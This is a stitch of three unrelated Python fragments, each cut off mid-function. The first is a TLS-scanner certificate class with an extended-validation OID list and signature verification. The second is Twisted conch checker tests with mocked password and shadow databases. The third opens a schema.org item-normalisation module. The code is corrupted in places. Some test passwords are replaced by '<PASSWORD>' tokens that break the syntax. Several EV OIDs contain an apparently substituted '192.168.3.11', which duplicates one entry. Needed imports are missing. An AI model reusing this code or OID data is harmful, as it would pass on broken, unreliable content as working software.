from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import (
ec,
rsa,
dsa,
ed25519,
ed448,
)
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.serialization import Encoding
from cryptography.hazmat.primitives.asymmetric import padding
# list of EV OIDs. Sources:
# - https://chromium.googlesource.com/chromium/src/net/+/refs/heads/main/cert/ev_root_ca_metadata.cc # noqa
# - https://hg.mozilla.org/mozilla-central/file/tip/security/certverifier/ExtendedValidation.cpp # noqa
_ev_oids = [
"1.2.156.112559.1.1.6.1",
"1.2.392.200091.100.721.1",
"1.2.616.1.113527.2.5.1.1",
"1.3.159.1.17.1",
"1.3.171.1.1.10.5.2",
"1.3.6.1.4.1.13177.10.1.3.10",
"1.3.6.1.4.1.14777.6.1.1",
"1.3.6.1.4.1.14777.6.1.2",
"1.3.6.1.4.1.17326.10.14.2.1.2",
"1.3.6.1.4.1.17326.10.14.2.2.2",
"1.3.6.1.4.1.34697.2.1",
"1.3.6.1.4.1.34697.2.2",
"1.3.6.1.4.1.34697.2.3",
"1.3.6.1.4.1.34697.2.4",
"1.3.6.1.4.1.40869.1.1.22.3",
"1.3.6.1.4.1.4146.1.1",
"1.3.6.1.4.1.4788.2.202.1",
"1.3.6.1.4.1.6334.1.100.1",
"1.3.6.1.4.1.6449.1.2.1.5.1",
"1.3.6.1.4.1.782.1.2.1.8.1",
"1.3.6.1.4.1.7879.13.24.1",
"1.3.6.1.4.1.8024.0.2.100.1.2",
"2.16.156.112554.3",
"2.16.528.1.1003.1.2.7",
"2.16.578.1.26.1.3.3",
"2.16.756.1.89.1.2.1.1",
"2.16.756.5.14.7.4.8",
"2.16.792.3.0.4.1.1.4",
"2.16.840.1.114028.10.1.2",
"2.16.840.1.114404.1.1.2.4.1",
"2.16.840.1.114412.2.1",
"2.16.840.1.114413.192.168.3.11",
"2.16.840.1.114414.192.168.3.11",
"2.16.840.1.114414.192.168.3.11",
"2.23.140.1.1",
]
class Certificate(object):
"""Represents a certificate.
The arguments der and pem are exclusive.
Arguments:
der: the certificate in DER-format (raw bytes)
pem: the certificate in PEM-format
x509_cert: a certificate object from the cryptography library
parse: whether the certificate shall be parsed (i.e., all relevant
data are extracted from the given der/pem structure), or if it shall just
be stored. In the latter case the certificate will be parsed if a
property is accessed.
"""
def __init__(
self,
der: Optional[bytes] = None,
pem: Optional[bytes] = None,
x509_cert: Optional[x509.Certificate] = None,
parse: bool = False,
) -> None:
if (der, pem, x509_cert).count(None) != 2:
raise ValueError("der, pem and x509_cert are exclusive")
self._bytes = None
self._pem = None
self._parsed = None
self._subject_str = None
self._self_signed = None
self.auth_key_id = None
self.subject_key_id = None
self.subject_matches: Optional[bool] = None
self.fingerprint_sha1 = None
self.fingerprint_sha256 = None
self.tls12_signature_algorithms = None
self.tls13_signature_algorithms = None
self.crl_status = None
self.ocsp_status = None
self.issues: List[str] = []
self.trusted = tls.ScanState.UNDETERMINED
self.tls_extensions: List[ext.Extension] = []
self.issuer_cert = None
self.ocsp_must_staple = tls.ScanState.FALSE
self.ocsp_must_staple_multi = tls.ScanState.FALSE
self.extended_validation = tls.ScanState.NA
self.from_trust_store = False
if der is not None:
self._bytes = der
if parse:
self._parsed = x509.load_der_x509_certificate(self._bytes)
self._parse()
elif pem is not None:
if isinstance(pem, str):
pem = pem.encode()
self._pem = pem
self._parsed = x509.load_pem_x509_certificate(pem)
self._parse()
else:
self._parsed = x509_cert
if parse:
self._parse()
def __str__(self):
return self.subject_str
def __eq__(self, other):
return self.bytes == other.bytes
@property
def subject_str(self):
"""str: The subject name formatted according to RFC 4514.
"""
if self._subject_str is None:
self._subject_str = self._parsed.subject.rfc4514_string()
return self._subject_str
@property
def parsed(self):
""":obj:`cryptography.x509.Certificate`: the x509 certificate object
"""
if self._parsed is None:
self._parsed = x509.load_der_x509_certificate(self._bytes)
self._parse()
return self._parsed
@property
def bytes(self):
"""bytes: the certificate in raw format, i.e. in DER format.
"""
if self._bytes is None:
self._bytes = self.parsed.public_bytes(Encoding.DER)
return self._bytes
@property
def pem(self):
"""bytes: the certificate in pem format (it is a binary string!)"""
if self._pem is None:
self._pem = self.parsed.public_bytes(Encoding.PEM)
return self._pem
def _determine_signature_algorithms(self, public_key):
"""For a given public key provide the compatible signature algorithms.
"""
if isinstance(public_key, rsa.RSAPublicKey):
self.tls12_signature_algorithms = [
tls.SignatureScheme.RSA_PKCS1_SHA1,
tls.SignatureScheme.RSA_PKCS1_SHA256,
tls.SignatureScheme.RSA_PKCS1_SHA384,
tls.SignatureScheme.RSA_PKCS1_SHA512,
tls.SignatureScheme.RSA_PKCS1_MD5,
tls.SignatureScheme.RSA_PKCS1_SHA224,
# Currently, cryptography does not support RSA-PSS-PSS
# tls.SignatureScheme.RSA_PSS_PSS_SHA256,
# tls.SignatureScheme.RSA_PSS_PSS_SHA384,
# tls.SignatureScheme.RSA_PSS_PSS_SHA512,
tls.SignatureScheme.RSA_PSS_RSAE_SHA256,
tls.SignatureScheme.RSA_PSS_RSAE_SHA384,
tls.SignatureScheme.RSA_PSS_RSAE_SHA512,
]
self.tls13_signature_algorithms = [
# tls.SignatureScheme.RSA_PSS_PSS_SHA256,
# tls.SignatureScheme.RSA_PSS_PSS_SHA384,
# tls.SignatureScheme.RSA_PSS_PSS_SHA512,
tls.SignatureScheme.RSA_PSS_RSAE_SHA256,
tls.SignatureScheme.RSA_PSS_RSAE_SHA384,
tls.SignatureScheme.RSA_PSS_RSAE_SHA512,
]
elif isinstance(public_key, dsa.DSAPublicKey):
self.tls12_signature_algorithms = [
tls.SignatureScheme.DSA_MD5,
tls.SignatureScheme.DSA_SHA1,
tls.SignatureScheme.DSA_SHA224,
tls.SignatureScheme.DSA_SHA256,
tls.SignatureScheme.DSA_SHA384,
tls.SignatureScheme.DSA_SHA512,
]
self.tls13_signature_algorithms = []
elif isinstance(public_key, ec.EllipticCurvePublicKey):
size_to_algo = {
128: tls.SignatureScheme.ECDSA_SHA1,
224: tls.SignatureScheme.ECDSA_SECP224R1_SHA224,
256: tls.SignatureScheme.ECDSA_SECP256R1_SHA256,
384: tls.SignatureScheme.ECDSA_SECP384R1_SHA384,
512: tls.SignatureScheme.ECDSA_SECP521R1_SHA512,
}
sig_scheme = size_to_algo.get(public_key.curve.key_size)
if sig_scheme is None:
raise ValueError(
f"unknown key size {public_key.curve.key_size} for ECDSA public key"
)
self.tls12_signature_algorithms = [sig_scheme]
if sig_scheme is tls.SignatureScheme.ECDSA_SHA1:
self.tls13_signature_algorithms = []
else:
self.tls13_signature_algorithms = [sig_scheme]
elif isinstance(public_key, ed25519.Ed25519PublicKey):
self.tls12_signature_algorithms = [tls.SignatureScheme.ED25519]
self.tls13_signature_algorithms = [tls.SignatureScheme.ED25519]
elif isinstance(public_key, ed448.Ed448PublicKey):
self.tls12_signature_algorithms = [tls.SignatureScheme.ED448]
self.tls13_signature_algorithms = [tls.SignatureScheme.ED448]
def _parse(self):
"""Parse the certificate, so that all attributes are set.
"""
self.fingerprint_sha1 = self._parsed.fingerprint(hashes.SHA1())
self.fingerprint_sha256 = self._parsed.fingerprint(hashes.SHA256())
self.signature_algorithm = cert_utils.map_x509_sig_scheme(
self._parsed.signature_hash_algorithm, self._parsed.signature_algorithm_oid,
)
try:
key_usage = self._parsed.extensions.get_extension_for_oid(
ExtensionOID.KEY_USAGE
)
if key_usage.value.digital_signature:
self._determine_signature_algorithms(self._parsed.public_key())
except x509.ExtensionNotFound:
self._determine_signature_algorithms(self._parsed.public_key())
try:
self.auth_key_id = self._parsed.extensions.get_extension_for_oid(
ExtensionOID.AUTHORITY_KEY_IDENTIFIER
).value.key_identifier
except x509.ExtensionNotFound:
self.auth_key_id = None
try:
self.subject_key_id = self._parsed.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_KEY_IDENTIFIER
).value.digest
except x509.ExtensionNotFound:
self.subject_key_id = None
try:
tls_features = self._parsed.extensions.get_extension_for_oid(
ExtensionOID.TLS_FEATURE
).value
if x509.TLSFeatureType.status_request in tls_features:
self.ocsp_must_staple = tls.ScanState.TRUE
if x509.TLSFeatureType.status_request_v2 in tls_features:
self.ocsp_must_staple_multi = tls.ScanState.TRUE
except x509.ExtensionNotFound:
pass
try:
basic_constr = self._parsed.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
).value
if not basic_constr.ca:
try:
cert_policies = self._parsed.extensions.get_extension_for_oid(
ExtensionOID.CERTIFICATE_POLICIES
).value
if any(
pol.policy_identifier.dotted_string in _ev_oids
for pol in cert_policies
):
self.extended_validation = tls.ScanState.TRUE
else:
self.extended_validation = tls.ScanState.FALSE
except x509.ExtensionNotFound:
pass
except x509.ExtensionNotFound:
pass
def _common_name(self, name):
"""From a given name, extract the common name
Note, that there might be multiple common names present, in this case
simple the first one is returned.
"""
cns = name.get_attributes_for_oid(NameOID.COMMON_NAME)
if not cns:
raise tls.UntrustedCertificate(f'no common name for "{self}"')
return cns[0].value
@property
def self_signed(self):
"""bool: Provide an indication if the certificate is self-signed.
"""
if self._self_signed is None:
self._self_signed = cert_utils.equal_names(
self.parsed.subject, self.parsed.issuer
)
return self._self_signed
def mark_untrusted(self, issue: str) -> None:
"""Mark the certificate as untrusted.
Arguments:
issue: the error message containing the reason
"""
self.trusted = tls.ScanState.FALSE
issue_long = f"certificate {self}: {issue}"
logging.debug(issue_long)
self.issues.append(issue)
def has_valid_period(self, timestamp: datetime.datetime) -> bool:
"""Determines if the period is valid.
Arguments:
timestamp: the timestamp to check against
Returns:
An indication if the period is valid
"""
valid = True
if timestamp < self.parsed.not_valid_before:
self.mark_untrusted("validity period not yet reached")
valid = False
if timestamp > self.parsed.not_valid_after:
self.mark_untrusted("validity period exceeded")
valid = False
return valid
def has_valid_subject(self, domain: str) -> bool:
"""Validate if the certificate matches the given domain
It takes the subject and the subject alternative name into account, and
supports wildcards as well.
Arguments:
domain: the domain to check against (normally used in the SNI)
Returns:
indication, if the domain name matches the certificate's subject/SAN
"""
subject_matches = False
domain = cert_utils.string_prep(domain)
no_subdomain = cert_utils.remove_subdomain(domain)
subject_cn = self._common_name(self.parsed.subject)
if cert_utils.subject_matches(subject_cn, domain, no_subdomain):
subject_matches = True
else:
try:
subj_alt_names = self.parsed.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
for name in subj_alt_names.value.get_values_for_type(x509.DNSName):
if cert_utils.subject_matches(name, domain, no_subdomain):
subject_matches = True
break
except x509.ExtensionNotFound:
pass
if not subject_matches:
self.mark_untrusted("subject name does not match")
self.subject_matches = subject_matches
return subject_matches
def _verify_rsa_pkcs(self, signature, data, hash_algo):
"""Verify RSA PKCSv15 signatures
"""
self.parsed.public_key().verify(
signature, data, padding.PKCS1v15(), hash_algo()
)
def _verify_dsa(self, signature, data, hash_algo):
"""Verify DSA signatures
"""
self.parsed.public_key().verify(signature, data, hash_algo())
def _verify_ecdsa(self, signature, data, hash_algo):
"""Verify ECDSA signatures
"""
self.parsed.public_key().verify(signature, data, ec.ECDSA(hash_algo()))
def _verify_xcurve(self, signature, data, hash_algo):
"""Verify X25519 and X488 signatures
"""
self.parsed.public_key().verify(signature, bytes(data))
def _verify_rsae_pss(self, signature, data, hash_algo):
"""Verify RSA-PSS signatures
"""
self.parsed.public_key().verify(
signature,
data,
padding.PSS(
mgf=padding.MGF1(hash_algo()), salt_length=hash_algo.digest_size
),
hash_algo(),
)
_sig_schemes = {
tls.SignatureScheme.RSA_PKCS1_MD5: (_verify_rsa_pkcs, hashes.MD5),
tls.SignatureScheme.RSA_PKCS1_SHA1: (_verify_rsa_pkcs, hashes.SHA1),
tls.SignatureScheme.RSA_PKCS1_SHA224: (_verify_rsa_pkcs, hashes.SHA224),
tls.SignatureScheme.RSA_PKCS1_SHA256: (_verify_rsa_pkcs, hashes.SHA256),
tls.SignatureScheme.RSA_PKCS1_SHA384: (_verify_rsa_pkcs, hashes.SHA384),
tls.SignatureScheme.RSA_PKCS1_SHA512: (_verify_rsa_pkcs, hashes.SHA512),
tls.SignatureScheme.DSA_MD5: (_verify_dsa, hashes.MD5),
tls.SignatureScheme.DSA_SHA1: (_verify_dsa, hashes.SHA1),
tls.SignatureScheme.DSA_SHA224: (_verify_dsa, hashes.SHA224),
tls.SignatureScheme.DSA_SHA256: (_verify_dsa, hashes.SHA256),
tls.SignatureScheme.DSA_SHA384: (_verify_dsa, hashes.SHA384),
tls.SignatureScheme.DSA_SHA512: (_verify_dsa, hashes.SHA512),
tls.SignatureScheme.ECDSA_SHA1: (_verify_ecdsa, hashes.SHA1),
tls.SignatureScheme.ECDSA_SECP224R1_SHA224: (_verify_ecdsa, hashes.SHA224),
tls.SignatureScheme.ECDSA_SECP256R1_SHA256: (_verify_ecdsa, hashes.SHA256),
tls.SignatureScheme.ECDSA_SECP384R1_SHA384: (_verify_ecdsa, hashes.SHA384),
tls.SignatureScheme.ECDSA_SECP521R1_SHA512: (_verify_ecdsa, hashes.SHA512),
tls.SignatureScheme.RSA_PSS_PSS_SHA256: (_verify_rsae_pss, hashes.SHA256),
tls.SignatureScheme.RSA_PSS_PSS_SHA384: (_verify_rsae_pss, hashes.SHA384),
tls.SignatureScheme.RSA_PSS_PSS_SHA512: (_verify_rsae_pss, hashes.SHA512),
tls.SignatureScheme.RSA_PSS_RSAE_SHA256: (_verify_rsae_pss, hashes.SHA256),
tls.SignatureScheme.RSA_PSS_RSAE_SHA384: (_verify_rsae_pss, hashes.SHA384),
tls.SignatureScheme.RSA_PSS_RSAE_SHA512: (_verify_rsae_pss, hashes.SHA512),
tls.SignatureScheme.ED25519: (_verify_xcurve, None),
tls.SignatureScheme.ED448: (_verify_xcurve, None),
}
def validate_signature(
self,
sig_scheme: tls.SignatureScheme,
data: builtins.bytes,
signature: builtins.bytes,
) -> None:
"""Validate a signature with a public key from a given certificate.
Arguments:
sig_scheme: The signature scheme to use
data: the bytes for which the signature is to be validated
signature: the signature
Raises:
cryptography.exceptions.InvalidSignature: If the signature does not
validate.
"""
sig_params = self._sig_schemes.get(sig_scheme)
if sig_params is None:
raise ValueError(f"signature scheme {sig_scheme} not supported")
sig_params[0](self, signature, data, sig_params[1])
def validate_cert_signature(self, cert: "Certificate") -> None:
"""Validate the signature within a certificate
Arguments:
cert: the certificate for which the signature shall be checked.
Raises:
cryptography.exceptions.InvalidSignature: If the signature does not
validate.
"""
self.validate_signature(
cert.signature_algorithm,
cert.parsed.tbs_certificate_bytes,
cert.parsed.signature,
)
def verify_signed_params(
prefix: bytes,
params: Any,
cert: Certificate,
default_scheme: tls.SignatureScheme,
version: tls.Version,
) -> None:
"""Verify the signed parameters from a ServerKeyExchange message.
Arguments:
prefix: the bytes to prepend to the data
params: the parameter block from the ServerKeyExchange message
cert: the certificate used to validate the data
default_scheme: the default signature scheme to use (if not present in
the message)
version: the TLS version. For TLS1.1 and below the signature is
constructed differently (using SHA1 + MD digests)
Raises:
| |
<reponame>muelli/twisted
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.conch.checkers}.
"""
try:
import crypt
except ImportError:
cryptSkip = 'cannot run without crypt module'
else:
cryptSkip = ''
import os
from base64 import encodebytes
from collections import namedtuple
from io import BytesIO
from zope.interface.verify import verifyObject
from twisted.python import util
from twisted.python.failure import Failure
from twisted.python.reflect import requireModule
from twisted.trial.unittest import TestCase
from twisted.python.filepath import FilePath
from twisted.cred.checkers import InMemoryUsernamePasswordDatabaseDontUse
from twisted.cred.credentials import UsernamePassword, IUsernamePassword, \
SSHPrivateKey, ISSHPrivateKey
from twisted.cred.error import UnhandledCredentials, UnauthorizedLogin
from twisted.python.fakepwd import UserDatabase, ShadowDatabase
from twisted.test.test_process import MockOS
if requireModule('cryptography') and requireModule('pyasn1'):
dependencySkip = ''
from twisted.conch.ssh import keys
from twisted.conch import checkers
from twisted.conch.error import NotEnoughAuthentication, ValidPublicKey
from twisted.conch.test import keydata
else:
dependencySkip = "can't run without cryptography and PyASN1"
if getattr(os, 'geteuid', None) is None:
euidSkip = "Cannot run without effective UIDs (questionable)"
else:
euidSkip = ''
class HelperTests(TestCase):
"""
Tests for helper functions L{verifyCryptedPassword}, L{_pwdGetByName} and
L{_shadowGetByName}.
"""
skip = cryptSkip or dependencySkip
def setUp(self):
self.mockos = MockOS()
def test_verifyCryptedPassword(self):
"""
L{verifyCryptedPassword} returns C{True} if the plaintext password
passed to it matches the encrypted password passed to it.
"""
password = '<PASSWORD>'
salt = '<PASSWORD>'
crypted = crypt.crypt(password, salt)
self.assertTrue(
checkers.verifyCryptedPassword(crypted, password),
'%r supposed to be valid encrypted password for %r' % (
crypted, password))
def test_verifyCryptedPasswordMD5(self):
"""
L{verifyCryptedPassword} returns True if the provided cleartext password
matches the provided MD5 password hash.
"""
password = 'password'
salt = <PASSWORD>'
crypted = crypt.crypt(password, salt)
self.assertTrue(
checkers.verifyCryptedPassword(crypted, password),
'%r supposed to be valid encrypted password for %s' % (
crypted, password))
def test_refuteCryptedPassword(self):
"""
L{verifyCryptedPassword} returns C{False} if the plaintext password
passed to it does not match the encrypted password passed to it.
"""
password = '<PASSWORD>'
wrong = '<PASSWORD>'
crypted = crypt.crypt(password, password)
self.assertFalse(
checkers.verifyCryptedPassword(crypted, wrong),
'%r not supposed to be valid encrypted password for %s' % (
crypted, wrong))
def test_pwdGetByName(self):
"""
L{_pwdGetByName} returns a tuple of items from the UNIX /etc/passwd
database if the L{pwd} module is present.
"""
userdb = UserDatabase()
userdb.addUser(
'alice', 'secrit', 1, 2, 'first last', '/foo', '/bin/sh')
self.patch(checkers, 'pwd', userdb)
self.assertEqual(
checkers._pwdGetByName('alice'), userdb.getpwnam('alice'))
def test_pwdGetByNameWithoutPwd(self):
"""
If the C{pwd} module isn't present, L{_pwdGetByName} returns L{None}.
"""
self.patch(checkers, 'pwd', None)
self.assertIsNone(checkers._pwdGetByName('alice'))
def test_shadowGetByName(self):
"""
L{_shadowGetByName} returns a tuple of items from the UNIX /etc/shadow
database if the L{spwd} is present.
"""
userdb = ShadowDatabase()
userdb.addUser('bob', 'passphrase', 1, 2, 3, 4, 5, 6, 7)
self.patch(checkers, 'spwd', userdb)
self.mockos.euid = 2345
self.mockos.egid = 1234
self.patch(util, 'os', self.mockos)
self.assertEqual(
checkers._shadowGetByName('bob'), userdb.getspnam('bob'))
self.assertEqual(self.mockos.seteuidCalls, [0, 2345])
self.assertEqual(self.mockos.setegidCalls, [0, 1234])
def test_shadowGetByNameWithoutSpwd(self):
"""
L{_shadowGetByName} returns L{None} if C{spwd} is not present.
"""
self.patch(checkers, 'spwd', None)
self.assertIsNone(checkers._shadowGetByName('bob'))
self.assertEqual(self.mockos.seteuidCalls, [])
self.assertEqual(self.mockos.setegidCalls, [])
class SSHPublicKeyDatabaseTests(TestCase):
"""
Tests for L{SSHPublicKeyDatabase}.
"""
skip = euidSkip or dependencySkip
def setUp(self):
self.checker = checkers.SSHPublicKeyDatabase()
self.key1 = encodebytes(b"foobar")
self.key2 = encodebytes(b"eggspam")
self.content = (b"t1 " + self.key1 + b" foo\nt2 " + self.key2 +
b" egg\n")
self.mockos = MockOS()
self.mockos.path = FilePath(self.mktemp())
self.mockos.path.makedirs()
self.patch(util, 'os', self.mockos)
self.sshDir = self.mockos.path.child('.ssh')
self.sshDir.makedirs()
userdb = UserDatabase()
userdb.addUser(
b'user', b'password', 1, 2, b'first last',
self.mockos.path.path, b'/bin/shell')
self.checker._userdb = userdb
def test_deprecated(self):
"""
L{SSHPublicKeyDatabase} is deprecated as of version 15.0
"""
warningsShown = self.flushWarnings(
offendingFunctions=[self.setUp])
self.assertEqual(warningsShown[0]['category'], DeprecationWarning)
self.assertEqual(
warningsShown[0]['message'],
"twisted.conch.checkers.SSHPublicKeyDatabase "
"was deprecated in Twisted 15.0.0: Please use "
"twisted.conch.checkers.SSHPublicKeyChecker, "
"initialized with an instance of "
"twisted.conch.checkers.UNIXAuthorizedKeysFiles instead.")
self.assertEqual(len(warningsShown), 1)
def _testCheckKey(self, filename):
self.sshDir.child(filename).setContent(self.content)
user = UsernamePassword(b"<PASSWORD>", b"password")
user.blob = b"foobar"
self.assertTrue(self.checker.checkKey(user))
user.blob = b"eggspam"
self.assertTrue(self.checker.checkKey(user))
user.blob = b"notallowed"
self.assertFalse(self.checker.checkKey(user))
def test_checkKey(self):
"""
L{SSHPublicKeyDatabase.checkKey} should retrieve the content of the
authorized_keys file and check the keys against that file.
"""
self._testCheckKey("authorized_keys")
self.assertEqual(self.mockos.seteuidCalls, [])
self.assertEqual(self.mockos.setegidCalls, [])
def test_checkKey2(self):
"""
L{SSHPublicKeyDatabase.checkKey} should retrieve the content of the
authorized_keys2 file and check the keys against that file.
"""
self._testCheckKey("authorized_keys2")
self.assertEqual(self.mockos.seteuidCalls, [])
self.assertEqual(self.mockos.setegidCalls, [])
def test_checkKeyAsRoot(self):
"""
If the key file is readable, L{SSHPublicKeyDatabase.checkKey} should
switch its uid/gid to the ones of the authenticated user.
"""
keyFile = self.sshDir.child("authorized_keys")
keyFile.setContent(self.content)
# Fake permission error by changing the mode
keyFile.chmod(0o000)
self.addCleanup(keyFile.chmod, 0o777)
# And restore the right mode when seteuid is called
savedSeteuid = self.mockos.seteuid
def seteuid(euid):
keyFile.chmod(0o777)
return savedSeteuid(euid)
self.mockos.euid = 2345
self.mockos.egid = 1234
self.patch(self.mockos, "seteuid", seteuid)
self.patch(util, 'os', self.mockos)
user = UsernamePassword(b"user", b"password")
user.blob = b"foobar"
self.assertTrue(self.checker.checkKey(user))
self.assertEqual(self.mockos.seteuidCalls, [0, 1, 0, 2345])
self.assertEqual(self.mockos.setegidCalls, [2, 1234])
def test_requestAvatarId(self):
"""
L{SSHPublicKeyDatabase.requestAvatarId} should return the avatar id
passed in if its C{_checkKey} method returns True.
"""
def _checkKey(ignored):
return True
self.patch(self.checker, 'checkKey', _checkKey)
credentials = SSHPrivateKey(
b'test', b'ssh-rsa', keydata.publicRSA_openssh, b'foo',
keys.Key.fromString(keydata.privateRSA_openssh).sign(b'foo'))
d = self.checker.requestAvatarId(credentials)
def _verify(avatarId):
self.assertEqual(avatarId, b'test')
return d.addCallback(_verify)
def test_requestAvatarIdWithoutSignature(self):
"""
L{SSHPublicKeyDatabase.requestAvatarId} should raise L{ValidPublicKey}
if the credentials represent a valid key without a signature. This
tells the user that the key is valid for login, but does not actually
allow that user to do so without a signature.
"""
def _checkKey(ignored):
return True
self.patch(self.checker, 'checkKey', _checkKey)
credentials = SSHPrivateKey(
b'test', b'ssh-rsa', keydata.publicRSA_openssh, None, None)
d = self.checker.requestAvatarId(credentials)
return self.assertFailure(d, ValidPublicKey)
def test_requestAvatarIdInvalidKey(self):
"""
If L{SSHPublicKeyDatabase.checkKey} returns False,
C{_cbRequestAvatarId} should raise L{UnauthorizedLogin}.
"""
def _checkKey(ignored):
return False
self.patch(self.checker, 'checkKey', _checkKey)
d = self.checker.requestAvatarId(None);
return self.assertFailure(d, UnauthorizedLogin)
def test_requestAvatarIdInvalidSignature(self):
"""
Valid keys with invalid signatures should cause
L{SSHPublicKeyDatabase.requestAvatarId} to return a {UnauthorizedLogin}
failure
"""
def _checkKey(ignored):
return True
self.patch(self.checker, 'checkKey', _checkKey)
credentials = SSHPrivateKey(
b'test', b'ssh-rsa', keydata.publicRSA_openssh, b'foo',
keys.Key.fromString(keydata.privateDSA_openssh).sign(b'foo'))
d = self.checker.requestAvatarId(credentials)
return self.assertFailure(d, UnauthorizedLogin)
def test_requestAvatarIdNormalizeException(self):
"""
Exceptions raised while verifying the key should be normalized into an
C{UnauthorizedLogin} failure.
"""
def _checkKey(ignored):
return True
self.patch(self.checker, 'checkKey', _checkKey)
credentials = SSHPrivateKey(b'test', None, b'blob', b'sigData', b'sig')
d = self.checker.requestAvatarId(credentials)
def _verifyLoggedException(failure):
errors = self.flushLoggedErrors(keys.BadKeyError)
self.assertEqual(len(errors), 1)
return failure
d.addErrback(_verifyLoggedException)
return self.assertFailure(d, UnauthorizedLogin)
class SSHProtocolCheckerTests(TestCase):
"""
Tests for L{SSHProtocolChecker}.
"""
skip = dependencySkip
def test_registerChecker(self):
"""
L{SSHProcotolChecker.registerChecker} should add the given checker to
the list of registered checkers.
"""
checker = checkers.SSHProtocolChecker()
self.assertEqual(checker.credentialInterfaces, [])
checker.registerChecker(checkers.SSHPublicKeyDatabase(), )
self.assertEqual(checker.credentialInterfaces, [ISSHPrivateKey])
self.assertIsInstance(checker.checkers[ISSHPrivateKey],
checkers.SSHPublicKeyDatabase)
def test_registerCheckerWithInterface(self):
"""
If a specific interface is passed into
L{SSHProtocolChecker.registerChecker}, that interface should be
registered instead of what the checker specifies in
credentialIntefaces.
"""
checker = checkers.SSHProtocolChecker()
self.assertEqual(checker.credentialInterfaces, [])
checker.registerChecker(checkers.SSHPublicKeyDatabase(),
IUsernamePassword)
self.assertEqual(checker.credentialInterfaces, [IUsernamePassword])
self.assertIsInstance(checker.checkers[IUsernamePassword],
checkers.SSHPublicKeyDatabase)
def test_requestAvatarId(self):
"""
L{SSHProtocolChecker.requestAvatarId} should defer to one if its
registered checkers to authenticate a user.
"""
checker = checkers.SSHProtocolChecker()
passwordDatabase = InMemoryUsernamePasswordDatabaseDontUse()
passwordDatabase.addUser(b'test', b'test')
checker.registerChecker(passwordDatabase)
d = checker.requestAvatarId(UsernamePassword(b'test', b'test'))
def _callback(avatarId):
self.assertEqual(avatarId, b'test')
return d.addCallback(_callback)
def test_requestAvatarIdWithNotEnoughAuthentication(self):
"""
If the client indicates that it is never satisfied, by always returning
False from _areDone, then L{SSHProtocolChecker} should raise
L{NotEnoughAuthentication}.
"""
checker = checkers.SSHProtocolChecker()
def _areDone(avatarId):
return False
self.patch(checker, 'areDone', _areDone)
passwordDatabase = InMemoryUsernamePasswordDatabaseDontUse()
passwordDatabase.addUser(b'test', b'test')
checker.registerChecker(passwordDatabase)
d = checker.requestAvatarId(UsernamePassword(b'test', b'test'))
return self.assertFailure(d, NotEnoughAuthentication)
def test_requestAvatarIdInvalidCredential(self):
"""
If the passed credentials aren't handled by any registered checker,
L{SSHProtocolChecker} should raise L{UnhandledCredentials}.
"""
checker = checkers.SSHProtocolChecker()
d = checker.requestAvatarId(UsernamePassword(b'test', b'test'))
return self.assertFailure(d, UnhandledCredentials)
def test_areDone(self):
"""
The default L{SSHProcotolChecker.areDone} should simply return True.
"""
self.assertTrue(checkers.SSHProtocolChecker().areDone(None))
class UNIXPasswordDatabaseTests(TestCase):
"""
Tests for L{UNIXPasswordDatabase}.
"""
skip = cryptSkip or dependencySkip
def assertLoggedIn(self, d, username):
"""
Assert that the L{Deferred} passed in is called back with the value
'username'. This represents a valid login for this TestCase.
NOTE: To work, this method's return value must be returned from the
test method, or otherwise hooked up to the test machinery.
@param d: a L{Deferred} from an L{IChecker.requestAvatarId} method.
@type d: L{Deferred}
@rtype: L{Deferred}
"""
result = []
d.addBoth(result.append)
self.assertEqual(len(result), 1, "login incomplete")
if isinstance(result[0], Failure):
result[0].raiseException()
self.assertEqual(result[0], username)
def test_defaultCheckers(self):
"""
L{UNIXPasswordDatabase} with no arguments has checks the C{pwd} database
and then the C{spwd} database.
"""
checker = checkers.UNIXPasswordDatabase()
def crypted(username, password):
salt = crypt.crypt(password, username)
crypted = crypt.crypt(password, '$1$' + salt)
return crypted
pwd = UserDatabase()
pwd.addUser('alice', crypted('alice', 'password'),
1, 2, 'foo', '/foo', '/bin/sh')
# x and * are convention for "look elsewhere for the password"
pwd.addUser('bob', 'x', 1, 2, 'bar', '/bar', '/bin/sh')
spwd = ShadowDatabase()
spwd.addUser('alice', 'wrong', 1, 2, 3, 4, 5, 6, 7)
spwd.addUser('bob', crypted('bob', 'password'),
8, 9, 10, 11, 12, 13, 14)
self.patch(checkers, 'pwd', pwd)
self.patch(checkers, 'spwd', spwd)
mockos = MockOS()
self.patch(util, 'os', mockos)
mockos.euid = 2345
mockos.egid = 1234
cred = UsernamePassword(b"alice", b"password")
self.assertLoggedIn(checker.requestAvatarId(cred), | |
#
# Copyright (c) 2020 Expert System Iberia
#
"""Provides normalisation of a tree of schema.org compliant items into
a dict of identifiers to relatively flat items with references between
each other.
"""
import copy
import logging
from acred import content
from esiutils import dictu, hashu
logger = logging.getLogger(__name__)
def normalise_nested_item(tree, cfg):
"""Converts a nested data item into an index dict
:param tree: a nested data item
:param cfg: config options
:returns: an ident dict containing identifiers as the keys and
relatively flat items as the values. The dict will also contain
a special key `mainItem` which has as a value the main
identifier string for the input tree
:rtype: dict
"""
assert content.is_item(tree)
logger.debug('extracting item and linked items from %s' % (list(tree.keys())))
ident_tree = ensure_ident(tree, cfg)
ident2items = index_ident_tree(ident_tree, cfg)
result = {k: item_with_refs(v, cfg) for k, v in ident2items.items()}
return {**result,
'mainItem': get_item_identifiers(ident_tree, cfg)[0]}
def nested_item_as_graph(tree, cfg):
"""Converts a nested data item into a graph dict
:param tree: a nested data item
:param cfg: config options
:returns: a graph dict with fields "nodes" and "links"
:rtype: dict
"""
assert content.is_item(tree)
logger.debug('extracting item and linked items from %s' % (list(tree.keys())))
ident_tree = ensure_ident(tree, cfg)
ident2items = index_ident_tree(ident_tree, {**cfg,
'unique_id_index': True})
node_links_tuples = [item_and_links(v, cfg) for k, v in ident2items.items()]
nodes = [n for n, links in node_links_tuples]
if 'ensureUrls' in cfg:
nodes = [ensure_url(n, cfg) for n in nodes]
links = [link for n, links in node_links_tuples
for link in links]
return {'@context': 'http://coinform.eu',
'@type': 'Graph',
'nodes': nodes,
'links': links,
'mainNode': get_item_identifiers(ident_tree, cfg)[0]}
def trim_tree(tree, prop, depth):
